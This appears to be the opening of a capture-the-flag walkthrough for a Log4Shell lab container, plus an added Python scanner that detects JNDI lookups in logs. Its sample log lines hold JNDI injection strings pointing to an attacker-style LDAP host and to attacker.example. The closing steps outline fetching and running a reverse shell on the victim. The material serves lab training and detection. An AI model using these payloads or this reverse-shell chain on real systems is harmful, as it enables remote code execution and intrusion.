
Want to run this Docker container locally?
docker run -d -p 9026:8080 -p 3306:3306 --restart always --name Flag-red47 joshbeck2024/ctf-log4shell-jndi-flag-red47
- This one is a tough nut to crack, but log4shell is definitely out there!
JNDI / Malicious LDAP Attack Path (CTF Overview)
- In this challenge, an attacker runs JNDI-Exploit-Kit, which spins up a malicious LDAP server under the attacker’s control.
- When the vulnerable application logs attacker-supplied input, that input contains a specially crafted JNDI lookup string.
- Instead of just recording text, the logger unknowingly asks the LDAP server for instructions.
- The attacker’s LDAP server responds with instructions telling the vulnerable application to load and execute attacker-controlled code.
- Because the application trusts JNDI lookups, it automatically follows these instructions, resulting in remote command execution triggered by logging data.
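The attack path above starts with a JNDI lookup string landing in a log message, so the defender-side check is to scan logs for that string and pull out where it points. The following is an added example (not part of the original challenge write-up): a small Python scanner over constructed web-server log lines that reports each `${jndi:...}` lookup with its scheme, host and port, so a responder can see which LDAP/RMI endpoints a vulnerable app was being steered to. The log lines and hostnames in it are made up for the demonstration.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Matches a JNDI lookup the way Log4j 2 (before the fix) would interpret it in a
# logged message: ${jndi:<scheme>:<rest>}. Schemes seen in Log4Shell traffic
# include ldap, ldaps, rmi and dns; the host/port are attacker-controlled.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:(?://)?(?P<rest>[^}]*)\}",
    re.IGNORECASE,
)

@dataclass
class JndiHit:
    line_no: int      # 1-based line in the scanned log
    scheme: str       # lowercased lookup scheme (ldap, rmi, ...)
    host: str         # host the application would have connected to
    port: Optional[int]
    raw: str          # the full matched lookup string, for the incident record

def parse_target(rest: str):
    # rest looks like "host:port/path" or "host/path"; split off host and port
    hostport = rest.split("/", 1)[0]
    if ":" in hostport:
        host, port = hostport.rsplit(":", 1)
        return host, int(port) if port.isdigit() else None
    return hostport, None

def scan_log(lines: List[str]) -> List[JndiHit]:
    """Return every JNDI lookup found in the given log lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in JNDI_RE.finditer(line):
            host, port = parse_target(m.group("rest"))
            hits.append(JndiHit(n, m.group("scheme").lower(), host, port, m.group(0)))
    return hits

# Constructed sample log: one benign request, one lookup smuggled in the
# User-Agent pointing at an LDAP listener on 1389 (as in the challenge), and
# one upper-cased RMI lookup in the query string.
SAMPLE_LOG = [
    '10.0.0.7 - - [01/Jan/2024:10:00:00] "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2024:10:00:01] "GET /login HTTP/1.1" 200 "${jndi:ldap://10.0.0.5:1389/a}"',
    '10.0.0.7 - - [01/Jan/2024:10:00:02] "GET /?q=${JNDI:RMI://attacker.example:1099/obj} HTTP/1.1" 400 "-"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.scheme} -> {hit.host}:{hit.port}  ({hit.raw})")
```

Any hit from a host you do not own is a sign the logging path was reachable by untrusted input; pair it with outbound connection logs for the same host and port to confirm whether the lookup actually fired.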
Steps We’ll Take:
- We’ll prep Kali so it is running a version of Java that is <12, because newer versions of Java won’t work correctly with JNDI-Exploit-Kit.
- We’ll use JNDI-Exploit-Kit to spin up a vulnerable LDAP server on port 1389.
- We will specify -C when we create this server. -C means (command): anything we put after -C will be executed on the server.
- We’ll spin up an http.server on port 8000, which will host a reverse-shell file we want to execute (bash.sh).
- We’ll force the vulnerable machine to fetch this file.
- We’ll force the vulnerable machine to chmod 777 the file.
- We’ll force the machine to execute the reverse shell, which we’ll be listening for on our attack box.
Install maven
sudo apt install maven